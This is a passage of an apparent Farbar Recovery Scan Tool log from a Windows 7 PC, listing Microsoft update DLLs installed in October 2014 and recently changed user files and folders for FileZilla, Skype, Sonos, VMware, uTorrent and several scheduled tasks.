2014-10-14 22:16 - 2014-10-06 19:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 22:16 - 2014-10-06 19:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 22:16 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 22:16 - 2014-09-25 15:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 22:16 - 2014-09-25 15:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 22:16 - 2014-09-25 15:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 22:16 - 2014-09-25 15:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 22:16 - 2014-09-25 15:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 22:16 - 2014-09-25 15:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 22:16 - 2014-09-25 15:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 22:16 - 2014-09-18 19:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 22:16 - 2014-09-18 18:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 22:16 - 2014-09-18 18:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 22:16 - 2014-09-18 18:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 22:16 - 2014-09-18 18:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 22:16 - 2014-09-18 18:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 22:16 - 2014-09-18 18:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 22:16 - 2014-09-18 18:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 22:16 - 2014-09-18 18:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 22:16 - 2014-09-18 18:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 22:16 - 2014-09-18 18:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 22:16 - 2014-09-18 18:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 22:16 - 2014-09-18 18:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 22:16 - 2014-09-18 18:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 22:16 - 2014-09-18 18:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 22:16 - 2014-09-18 18:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 22:16 - 2014-09-18 18:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 22:16 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 22:16 - 2014-09-18 18:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 22:16 - 2014-09-18 18:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 22:16 - 2014-09-18 18:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 22:16 - 2014-09-18 18:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 22:16 - 2014-09-18 18:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 22:16 - 2014-09-18 18:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 22:16 - 2014-09-18 18:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 22:16 - 2014-09-18 18:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 22:16 - 2014-09-18 17:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 22:16 - 2014-09-18 17:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 22:16 - 2014-09-18 17:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 22:16 - 2014-09-18 17:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 22:16 - 2014-09-18 17:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 22:16 - 2014-09-18 17:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 22:16 - 2014-09-18 17:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 22:16 - 2014-09-18 17:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 22:16 - 2014-09-18 17:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 22:16 - 2014-09-18 17:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 22:16 - 2014-09-18 17:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 22:16 - 2014-09-18 17:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 22:16 - 2014-09-18 17:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 22:16 - 2014-09-18 17:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 22:16 - 2014-09-18 17:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 22:16 - 2014-09-18 17:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 22:16 - 2014-09-18 17:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 22:16 - 2014-09-18 16:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 22:16 - 2014-09-18 16:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 22:16 - 2014-09-18 16:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 22:16 - 2014-09-18 16:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 22:16 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-14 22:16 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-14 22:16 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-14 22:16 - 2014-07-08 19:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-14 22:16 - 2014-07-08 19:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL
2014-10-14 22:16 - 2014-07-08 18:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL
2014-10-14 22:16 - 2014-07-08 15:38 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-14 22:16 - 2014-07-08 15:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls
2014-10-14 22:16 - 2014-07-06 19:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 22:16 - 2014-07-06 19:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 22:16 - 2014-07-06 19:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 22:16 - 2014-07-06 18:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 22:16 - 2014-07-06 18:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 22:16 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 22:15 - 2014-10-09 19:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 22:15 - 2014-10-09 19:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 22:15 - 2014-10-09 19:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 22:15 - 2014-09-17 19:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-14 22:15 - 2014-09-17 18:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-14 22:15 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 22:15 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-14 22:15 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-14 22:15 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-14 22:15 - 2014-08-18 20:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 22:15 - 2014-08-18 20:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 22:15 - 2014-08-18 20:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 22:15 - 2014-08-18 20:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 22:15 - 2014-08-18 20:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-14 22:15 - 2014-08-18 20:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-14 22:15 - 2014-08-18 20:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-14 22:15 - 2014-08-18 20:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 22:15 - 2014-08-18 20:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 22:15 - 2014-08-18 20:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-14 22:15 - 2014-08-18 19:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 22:15 - 2014-08-18 19:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-14 22:15 - 2014-08-18 19:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 22:15 - 2014-07-16 19:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-14 22:15 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-14 22:15 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-14 22:15 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-14 22:15 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-14 22:15 - 2014-07-16 18:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-14 22:15 - 2014-07-16 18:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-14 22:15 - 2014-07-16 18:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-14 22:15 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-14 22:15 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-14 22:15 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-14 22:15 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-14 22:15 - 2014-07-06 19:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 22:15 - 2014-07-06 19:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 22:15 - 2014-07-06 19:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 22:15 - 2014-07-06 19:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 22:15 - 2014-07-06 19:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 22:15 - 2014-07-06 19:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 22:15 - 2014-07-06 19:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 22:15 - 2014-07-06 19:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 22:15 - 2014-07-06 19:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 22:15 - 2014-07-06 19:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 22:15 - 2014-07-06 18:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 22:15 - 2014-07-06 18:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 22:15 - 2014-07-06 18:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 22:15 - 2014-07-06 18:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 22:15 - 2014-07-06 18:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 22:15 - 2014-07-06 18:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 22:15 - 2014-07-06 18:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 22:15 - 2014-07-06 18:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 22:15 - 2014-07-06 18:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 22:15 - 2014-07-06 18:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 22:15 - 2014-06-27 17:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 22:15 - 2014-06-27 17:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 22:15 - 2014-06-27 17:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-04 19:03 - 2014-10-04 19:04 - 00000000 ____D () C:\Users\Rod\Downloads\produkey-x64
2014-10-04 19:02 - 2014-10-04 19:02 - 00071779 _____ () C:\Users\Rod\Downloads\produkey-x64.zip
2014-10-02 12:15 - 2014-10-02 12:15 - 00000000 ____D () C:\Users\Rod\AppData\Local\Citrix
2014-10-02 07:02 - 2014-10-02 07:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Apps Sync
2014-09-30 17:08 - 2014-09-30 17:08 - 00003338 _____ () C:\Windows\System32\Tasks\Backup Data
2014-09-30 13:50 - 2014-09-24 19:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-09-30 13:50 - 2014-09-24 18:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-09-30 09:00 - 2014-09-30 09:00 - 00003441 _____ () C:\Users\Rod\Downloads\Active Services Report.csv
2014-09-25 14:02 - 2014-09-25 14:02 - 06057862 _____ (Tim Kosse) C:\Users\Rod\Downloads\FileZilla_3.9.0.5_win32-setup.exe
2014-09-23 17:40 - 2014-09-09 15:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-23 17:40 - 2014-09-09 14:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-09-19 17:20 - 2014-09-19 17:20 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-09-19 17:20 - 2014-09-19 17:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-17 15:12 - 2014-01-21 23:29 - 01298047 _____ () C:\Windows\WindowsUpdate.log
2014-10-17 15:11 - 2014-02-06 15:06 - 00000000 ____D () C:\Users\Rod\Documents\Outlook Files
2014-10-17 15:11 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\tracing
2014-10-17 15:00 - 2014-02-08 15:30 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-17 15:00 - 2014-02-08 15:30 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-17 12:09 - 2014-02-08 22:49 - 00000000 ____D () C:\ProgramData\Sonos,_Inc
2014-10-17 11:59 - 2009-07-13 21:45 - 00031952 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-17 11:59 - 2009-07-13 21:45 - 00031952 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-17 11:55 - 2014-02-08 15:43 - 00000000 ___RD () C:\Users\Rod\Documents\Google Drive
2014-10-17 11:54 - 2014-09-01 10:15 - 00002896 _____ () C:\Windows\System32\Tasks\AutoKMS
2014-10-17 11:54 - 2014-03-31 21:24 - 00000000 ____D () C:\ProgramData\boost_interprocess
2014-10-17 11:54 - 2014-03-09 10:28 - 00000266 _____ () C:\Windows\Tasks\AutoKMS.job
2014-10-17 11:54 - 2014-02-08 13:01 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\uTorrent
2014-10-17 11:53 - 2014-06-09 14:49 - 00065536 _____ () C:\Windows\system32\Ikeext.etl
2014-10-17 11:53 - 2014-01-21 23:56 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-10-17 11:53 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-17 11:53 - 2009-07-13 21:51 - 00035416 _____ () C:\Windows\setupact.log
2014-10-17 11:05 - 2010-11-20 20:47 - 00897972 _____ () C:\Windows\PFRO.log
2014-10-17 10:34 - 2014-02-10 10:46 - 00002068 ____H () C:\Users\Rod\Documents\Default.rdp
2014-10-16 12:04 - 2014-02-11 11:14 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-16 07:57 - 2010-08-02 08:22 - 00000000 ____D () C:\Users\Rod\Documents\Work
2014-10-15 17:31 - 2014-05-13 12:38 - 00001953 _____ () C:\Users\Public\Desktop\Sonos.lnk
2014-10-15 17:31 - 2014-02-08 22:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sonos
2014-10-15 17:31 - 2014-02-08 22:50 - 00000000 ____D () C:\Program Files (x86)\Sonos
2014-10-15 17:30 - 2014-02-08 22:47 - 00000000 ____D () C:\Users\Rod\AppData\Local\Downloaded Installations
2014-10-15 15:22 - 2014-02-06 12:06 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-15 11:06 - 2014-02-10 18:04 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\VMware
2014-10-15 10:51 - 2014-02-10 16:44 - 00002440 _____ () C:\Users\Public\Desktop\VMware vSphere Client.lnk
2014-10-15 10:51 - 2014-02-10 16:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VMware
2014-10-15 03:46 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-10-15 03:10 - 2009-07-13 21:45 - 00429288 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-15 03:07 - 2014-05-07 03:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-15 03:07 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism
2014-10-15 03:07 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\system32\Dism
2014-10-15 03:04 - 2014-02-06 13:48 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-15 00:30 - 2014-02-08 17:41 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\vlc
2014-10-14 23:54 - 2014-02-08 13:13 - 00000000 ____D () C:\Users\Rod\Downloads\Torrents
2014-10-14 20:28 - 2014-07-03 10:23 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\FileZilla
2014-10-12 11:32 - 2014-02-06 13:49 - 00000000 ____D () C:\Users\Rod\AppData\Local\Microsoft Help
2014-10-03 10:02 - 2014-02-06 12:06 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-02 07:01 - 2014-05-06 19:50 - 00000000 ____D () C:\Users\Default\AppData\Local\Google
2014-10-02 07:01 - 2014-05-06 19:50 - 00000000 ____D () C:\Users\Default User\AppData\Local\Google
2014-10-01 10:23 - 2014-02-06 13:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-09-28 22:49 - 2014-02-21 16:09 - 00000000 ____D () C:\Users\Rod\AppData\Roaming\Skype
2014-09-25 14:02 - 2014-08-21 16:57 - 06052529 _____ (Tim Kosse) C:\Users\Rod\Downloads\FileZilla_3.9.0.3_win32-setup.exe
2014-09-19 17:20 - 2014-02-21 16:08 - 00002515 _____ () C:\Users\Public\Desktop\Skype.lnk
